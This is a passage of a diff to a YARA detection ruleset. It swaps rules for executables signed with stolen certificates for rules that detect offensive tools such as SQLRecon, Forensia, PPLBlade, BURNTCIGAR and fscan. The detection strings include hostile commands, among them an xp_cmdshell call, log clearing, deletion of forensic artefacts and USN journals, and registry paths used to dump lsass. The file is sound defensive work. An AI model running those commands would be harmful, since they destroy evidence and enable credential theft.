 		author = "ditekSHen"
-		id = "1e290f81-11ab-5d5f-ab7a-c703c875bde4"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ec91285b-690d-5fd3-b0fc-f8d72cbb7e15"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3607-L3618"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1420-L1436"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ff29013eb20bccbec16107404fc18b07c87ac5269b788c48a49a490271e94052"
+		logic_hash = "784dbc518cf9492557c9b3536256c4a9b03e4536cf7cee7e764b8009dd4686bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c852fc9670391ff077eb2590639051efa42db5c9"
-		importance = 20
+
+	strings:
+		$s1 = "ConvertDLLToSQLBytes" ascii
+		$s2 = "\\SQLRecon.pdb" ascii
+		$s3 = "GetAllSQLServerInfo" ascii
+		$s4 = "<GetMSSQLSPNs>b__" ascii
+		$s5 = "select 1; exec master..xp_cmdshell" wide
+		$s6 = "-> Command Execution" wide
+		$s7 = ";EXEC dbo.sp_add_jobstep @job_name =" wide
+		$s8 = "EXEC sp_drop_trusted_assembly 0x" wide
+		$s9 = "(&(sAMAccountType=805306368)(servicePrincipalName=MSSQL*))" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DrWeb Digital LLC" and pe.signatures [ i ] . serial == "1f:b9:84:d5:a7:29:6b:a7:44:45:c2:3e:ad:7d:20:aa" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C314A8736F82C411B9F02076A6Db4771 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Atlasreaper : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects AtlasReaper command-line tool for Confluence and Jira reconnaissance, credential farming and social engineering"
 		author = "ditekSHen"
-		id = "0a8af16c-f232-5e09-9825-0e8203ba7b45"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "a0b4e134-bb05-5cc3-af71-516a0407aa1b"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3620-L3631"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1438-L1453"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8aa08c4d1da62d0629db6e29f7a730da3534f114620e30f8d89e5475c12f43de"
+		logic_hash = "4a0436d5c3f1609d23b2b919bebdc56a7fd63e81b99e72dcda1022487cb88240"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "9c49d7504551ad4ddffad206b095517a386e8a14"
-		importance = 20
+
+	strings:
+		$s1 = "/((?:A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})/" fullword wide
+		$s2 = "/rest/api/3/search?jql=" fullword wide
+		$s3 = "attachments+IS+NOT+EMPTY&fields=attachment,summary,status" fullword wide
+		$s4 = "<ParseJira>b__" ascii
+		$s5 = "<Atlas_Doc_Format>k__" ascii
+		$s6 = "<ParseConfluence>b__" ascii
+		$s7 = "AtlasReaper_ProcessedByFody" fullword ascii
+		$s8 = /AtlasReaper\.(Jira|Confluence)/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cbcbaeaabbfcebfcbbeeffeadfc" and pe.signatures [ i ] . serial == "c3:14:a8:73:6f:82:c4:11:b9:f0:20:76:a6:db:47:71" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5F7Ef778D51Cd33A5Fc0D2E035Ccd29D : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Ngroksharp : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects NgrokSharp .NET library for Ngrok"
 		author = "ditekSHen"
-		id = "95b1cba9-9625-55da-a321-08cdd4d3056f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "7c335021-4afd-5878-83c3-9bb2c81f3586"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3633-L3644"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1455-L1471"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b57fd9840dceea97a2f013f803e8639add6c6b01f3764b65b3c1fe60ae0dd57"
+		logic_hash = "c60637177114d369af9c3e96689811845ce1c1dfde8f7f971c4de21439564b4b"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "87229a298b8de0c7b8d4e23119af1e7850a073f5"
-		importance = 20
+
+	strings:
+		$x1 = "NgrokSharp" fullword wide
+		$x2 = "/entvex/NgrokSharp" ascii
+		$s1 = "start --none -region" wide
+		$s2 = "startTunnelDto" fullword wide
+		$s3 = "/tunnels/" fullword wide
+		$s4 = "<StartNgrok" ascii
+		$s5 = "INgrokManager" ascii
+		$s6 = "_tunnel_name" ascii
+		$s7 = "_ngrokDownloadUrl" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ffadbcfabbe" and pe.signatures [ i ] . serial == "5f:7e:f7:78:d5:1c:d3:3a:5f:c0:d2:e0:35:cc:d2:9d" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 4 of ( $* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ab1D5E43E4Dde77221381E21A764C082 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Ngrokgo : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Go implementation variant for Ngrok"
 		author = "ditekSHen"
-		id = "55135b31-93d7-512f-8506-51e49bc3dc92"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "b11f67c5-846d-57b2-8edc-521b2dc77503"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3646-L3657"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1473-L1488"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3746c3494dca7fd2e0c7ab6641fe9ebbb8519df755022a3bde99c192158e4299"
+		logic_hash = "4ec151661e3af922aba202c68392a2af17e2c4ed25a71a0b5aacc13fbfcc5c53"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b84a817517ed50dbae5439be54248d30bd7a3290"
-		importance = 20
+
+	strings:
+		$s1 = "/codegangsta/inject" fullword wide
+		$s2 = "go.ngrok.com/" ascii
+		$s3 = "GetIsNgrokDomain" ascii
+		$s4 = "GetNgrokMetering" ascii
+		$s5 = "*cli.ngrokService" ascii
+		$s6 = "GetAllowNgrokLink" ascii
+		$s7 = "ngrok {{.Name}}{{if .Flags}}" ascii
+		$s8 = "github.com/nikolay-ngrok/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dadddbffbfcbdaaeeccecbbffac" and pe.signatures [ i ] . serial == "00:ab:1d:5e:43:e4:dd:e7:72:21:38:1e:21:a7:64:c0:82" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4743E140C05B33F0449023946Bd05Acb : FILE
+rule DITEKSHEN_INDICATOR_Tool_Forensia : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Forensia anti-forensics tool used for erasing footprints"
 		author = "ditekSHen"
-		id = "f3e8046a-0df7-5a67-a363-02961ec1545b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "bcd05c2e-7ddd-5ce7-a6a7-0659bed38744"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3659-L3670"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1490-L1523"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be8764a008743f8ca8c1a5760c5daa7f6896c8710f5f79f9d5b42b07ef0d5fa8"
+		logic_hash = "7147eee62df10cd8a6c00ec80c4d1bdb8234a181dd6af81d0580d847f05bd0b6"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "7b32c8cc35b86608c522a38c4fe38ebaa57f27675504cba32e0ab6babbf5094a"
-		importance = 20
+
+	strings:
+		$c1 = "for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"" ascii
+		$c2 = "del /F /Q C:\\Windows\\Prefetch\\*" ascii
+		$c3 = "del C:\\Windows\\AppCompat\\Programs\\RecentFileCache.bcf" ascii
+		$c4 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\*" ascii
+		$c5 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" ascii
+		$c6 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" ascii
+		$c7 = "fsutil.exe usn deletejournal /D C:" ascii
+		$r1 = "\\Memory Management\\PrefetchParameters" wide
+		$r2 = "\\Explorer\\Advanced" wide
+		$r3 = "\\Services\\EventLog" wide
+		$r4 = "\\Shell\\BagMRU" wide
+		$r5 = "\\Control\\FileSystem" wide
+		$r6 = "\\Setup\\VC" wide
+		$s1 = "[LOG] - %s" wide
+		$s2 = "\\forensia\\regedit.hpp" wide
+		$s3 = "NtfsDisableLastAccessUpdate" wide
+		$s4 = "Melting The Executable" wide
+		$s5 = "Sysmon Unloader" wide
+		$s6 = "Rundll32.exe apphelp.dll,ShimFlushCache" ascii
+		$s7 = "\\Debug\\forensia.pdb" ascii
+		$s8 = { 55 00 00 00 aa 00 00 00 92 49 24 00 49 24 92 00
+                24 92 49 00 00 00 00 00 11 00 00 00 22 00 00 00
+                33 00 00 00 44 00 00 00 66 00 00 00 88 00 00 00
+                99 00 00 00 bb 00 00 00 cc 00 00 00 dd 00 00 00
+                ee 00 00 00 ff 00 00 00 6d b6 db 00 b6 db 6d 00
+                db 6d b6 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STROI RENOV SARL" and pe.signatures [ i ] . serial == "47:43:e1:40:c0:5b:33:f0:44:90:23:94:6b:d0:5a:cb" )
+		uint16( 0 ) == 0x5a4d and ( ( 4 of ( $c* ) and 2 of ( $r* ) ) or ( 4 of ( $r* ) and 2 of ( $c* ) ) or 6 of ( $s* ) or ( 3 of ( $s* ) and 2 of ( $r* ) and 1 of ( $c* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2C1Ee9B583310B5E34A1Ee6945A34B26 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Dogzproxy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Dogz proxy tool"
 		author = "ditekSHen"
-		id = "0cc94ceb-a5bf-511a-bcd0-136b5d35c348"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "de2a8d26-0e8e-5999-baca-1e43933af866"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3672-L3683"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1525-L1537"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4891757929b64b45591792dd2526ffb7588345f76bcbd3e47f567e72ba03d7f2"
+		logic_hash = "575cfed9cb7979216fd8fd2a05efe5dfece3a9120b4f185c015918337829ed63"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7af96a09b6c43426369126cfffac018f11e5562cb64d32e5140cff3f138ffea4"
-		importance = 20
+
+	strings:
+		$s1 = "LOGONSERVER=" fullword wide
+		$s2 = "DOGZ_E_" ascii
+		$s3 = "got handshake_id=%d" ascii
+		$s4 = "responser send connect ack" ascii
+		$s5 = "dogz " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Artmarket" and pe.signatures [ i ] . serial == "2c:1e:e9:b5:83:31:0b:5e:34:a1:ee:69:45:a3:4b:26" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D338F8A490E37E6C2Be80A0E349929Fa : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Fastreverseproxy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Fast Reverse Proxy (FRP) tool"
 		author = "ditekSHen"
-		id = "5bb542de-637f-58a4-b96a-f20dba7be1b7"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d643cc38-a96c-5353-bb46-ca46ea740e3b"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3685-L3696"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1539-L1555"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ed7a48df55f2d7873795470b9074421f4008d715db07978c79b174fc3f2a801a"
+		logic_hash = "c26d9e8833c7055a03a446eb983c7f70f1f18669d009ebc204dda3f0bb6048f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "480a9ce15fc76e03f096fda5af16e44e0d6a212d6f09a898f51ad5206149bbe1"
-		importance = 20
+
+	strings:
+		$x1 = "<title>frp client admin UI</title>" ascii
+		$x2 = "https://github.com/fatedier/frp" ascii
+		$s1 = ").SetLogin" ascii
+		$s2 = ").SetPing" ascii
+		$s3 = ").SetNewWorkConn" ascii
+		$s4 = ").ServeHTTP" ascii
+		$s5 = ").Middleware" ascii
+		$s6 = "frpc proxy config error:" ascii
+		$s7 = "frpc sudp visitor proxy is close" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAGUARO ApS" and pe.signatures [ i ] . serial == "00:d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( all of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_778906D40695F65Ba518Db760Df44Cd3 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Gogoscan : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects GoGo scan tool"
 		author = "ditekSHen"
-		id = "87f5a591-ed92-5ee8-99f8-04afe302609e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c24ede04-2971-55f8-8b60-ec3bdca844d7"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3698-L3709"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1557-L1571"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2687ec82b9c968dca91b8f54c600fae794d01be43a31cce4b0e6ef63672870fd"
+		logic_hash = "c9fbc98a28c74bf920f5f7d62713834d18b33b5c65483a1bd42e4555764c8346"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1103debcb1e48f7dda9cec4211c0a7a9c1764252"
-		importance = 20
+
+	strings:
+		$s1 = "(conn) (scan  (scan) MB in  Value>" ascii
+		$s2 = "sweep sysmontargettelnet" ascii
+		$s3 = "%d bytes(?i) (.*SESS.*?ID)([a-z0-9])([A-Z]+)" ascii
+		$s4 = "prepareForSweep" ascii
+		$s5 = "Scanned %s with %d ports, found %d" ascii
+		$s6 = "/chainreactors/gogo/" ascii
+		$s7 = "Starting task %s ,total ports: %d , mod: %s" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "77:89:06:d4:06:95:f6:5b:a5:18:db:76:0d:f4:4c:d3" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_45Eb9187A2505D8E6C842E6D366Ad0C8 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Gogoprocdump : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects GoGo (lsass) process dump tool"
 		author = "ditekSHen"
-		id = "75494bb2-fa70-5983-a75c-067b06c597e5"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "f92845c6-f8ae-50d0-97ea-cfa72051c2de"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3711-L3722"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1573-L1586"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a900017eb33db455b94e3474ce3a2f1ebf6416ff21477a464aba68d32fd7c938"
+		logic_hash = "f410882e4c6c8b65e7d3c192cf94bf99d61cf54dc21d80cdf17193b34752c576"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "63938d34572837514929fa7ae3cfebedf6d2cb65"
-		importance = 20
+
+	strings:
+		$s1 = "C:\\temp" ascii
+		$s2 = "gogo" fullword ascii
+		$s3 = "/DumpLsass-master/SilentProcessExit/" ascii
+		$s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zone" ascii
+		$s5 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe" ascii
+		$s6 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\lsass.exe" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BAKERA s.r.o." and pe.signatures [ i ] . serial == "45:eb:91:87:a2:50:5d:8e:6c:84:2e:6d:36:6a:d0:c8" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Cbc2Af7D82295A8535F3B26B47522640 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Fscan : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects GoGo scan tool"
 		author = "ditekSHen"
-		id = "d4f422a7-2b1c-5db0-ad9b-1eb8b3a75e3c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "3bf73853-15c1-54f7-866a-6a7632e39f19"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3724-L3735"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1588-L1602"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6d9fb9b36bc4370851fd0f54bb9fb05e02fc7a6288355b57073c31b1feade41e"
+		logic_hash = "b107eb767454c4c084a7237c107c8414bdb03c324902769ac544c5903e346e17"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "08d2c03d0959905b4b04caee1202b8ed748a8bd0"
-		importance = 20
+
+	strings:
+		$s1 = "fscan version:" ascii
+		$s2 = "Citrix-ConfProxyCitrix-MetaframeCitrix-NetScalerCitrix-XenServerCitrix_Netscaler" ascii
+		$s3 = "(AkamaiGHost)(DESCRIPTION=(Typecho</a>)(^.+)([0-9]+)(confluence.)(dotDefender)" ascii
+		$s4 = "/fscan/" ascii
+		$s5 = "WebScan.CheckDatas" ascii
+		$s6 = "'Exploit.Test" ascii
+		$s7 = "rules:" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eabfdafffefaccaedaec" and pe.signatures [ i ] . serial == "cb:c2:af:7d:82:29:5a:85:35:f3:b2:6b:47:52:26:40" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ca1D9391Cf5Fe3E696831D98D6C35A6 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_BURTNCIGAR : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BURNTCIGAR a utility which terminates processes associated with endpoint security software"
 		author = "ditekSHen"
-		id = "e2f026d6-031d-5058-a7f1-fc492ea47908"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "b5260d7e-07ac-5633-b450-e2124cbba65b"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3737-L3748"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1604-L1616"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4c60dea4fe28c2799dc88712275e62a795c848120c4b463109942b8d9bc29a81"
+		logic_hash = "4977332a0b20b300a5fc34f0f8d56221f55b66783853306d803e91701cb7e6ec"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0689776ca5ca0ca9641329dc29efdb61302d7378"
-		importance = 20
+		clamav1 = "INDICATOR.Win.TOOL.BURNTCIGAR"
+
+	strings:
+		$s1 = "Kill PID =" ascii
+		$s2 = "CreateFile Error =" ascii
+		$s3 = "\\KillAV" ascii
+		$s4 = "DeviceIoControl" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "www.norton.com" and pe.signatures [ i ] . serial == "0c:a1:d9:39:1c:f5:fe:3e:69:68:31:d9:8d:6c:35:a6" )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_43A36A26Ebc78E111A874D8211A95E3F : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Pplblade : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PPLBlade Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk"
 		author = "ditekSHen"
-		id = "651ca649-c707-59d2-b482-5ca6d1e569b0"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "60c9b036-51a0-5e08-83de-1f69f62245c3"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3750-L3761"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1634-L1658"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2588c91e1cce7e595e4237843b03f3e65427b4c3ea634e9a4f8249e9c9f49dbe"
+		logic_hash = "da21402b07fcd0358ba630e48ab35956cb7ed8c12836a339c85b2ee5e414543e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a346bda33b5b3bea04b299fe87c165c4f221645a"
-		importance = 20
+
+	strings:
+		$x1 = "PPLBlade" ascii
+		$x2 = "/PPLBlade/" ascii
+		$x3 = "PPLBlade.exe --mode" ascii
+		$x4 = "PPLBLADE.SYSPPLBlade.dmp" ascii
+		$s1 = "Dump bytes sent at %s:%d. Protocol: %s" ascii
+		$s2 = "Deobfuscated dump saved in file %s" ascii
+		$m1 = "main.WriteDriverOnDisk" ascii
+		$m2 = "main.ProcExpOpenProc" ascii
+		$m3 = "main.miniDumpCallback" ascii
+		$m4 = "main.copyDumpBytes" ascii
+		$m5 = "main.MiniDumpGetBytes" ascii
+		$m6 = "main.SendBytesRaw" ascii
+		$m7 = "main.SendBytesSMB" ascii
+		$m8 = "main.DeobfuscateDump" ascii
+		$m9 = "main.dumpMutex" ascii
+		$m10 = "main.dbghelpDLL" ascii
+		$m11 = "main.miniDumpWriteDump" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Efacefcafeabbdcbcea" and pe.signatures [ i ] . serial == "43:a3:6a:26:eb:c7:8e:11:1a:87:4d:82:11:a9:5e:3f" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and ( 1 of ( $s* ) or 3 of ( $m* ) ) ) or ( all of ( $s* ) and 3 of ( $m* ) ) or ( 7 of ( $m* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5172Caa2119185382343Fcbe09C43Bee : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Sharpldap : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SharpLDAP tool written in C# that aims to do enumeration via LDAP queries"
 		author = "ditekSHen"
-		id = "54f38317-2d36-54ec-a3fc-04f8b0fc5529"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "597e578d-41f0-595e-b92c-0c3676d8b47a"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3763-L3774"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1660-L1675"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7aa1447bd0ac43ac29ed69bd6618c3695bfb50517a7ffce7d4e793ae0c5e0fa6"
+		logic_hash = "da5db3f2907229dc68e3c6f3351361a4b1fb9fe8afc597c9dfe611f9725c6181"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "fd9b3f6b0eb9bd9baf7cbdc79ae7979b7ddad770"
-		importance = 20
+
+	strings:
+		$x1 = "SharpLDAP" ascii wide
+		$x2 = "SharpLDAP.pdb" ascii
+		$s1 = "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" wide
+		$s2 = "(&(servicePrincipalName=*))" wide
+		$s3 = "/Enumerating (Domain|Enterprise|Organizational|Service|Members|Users|Computers)/" wide
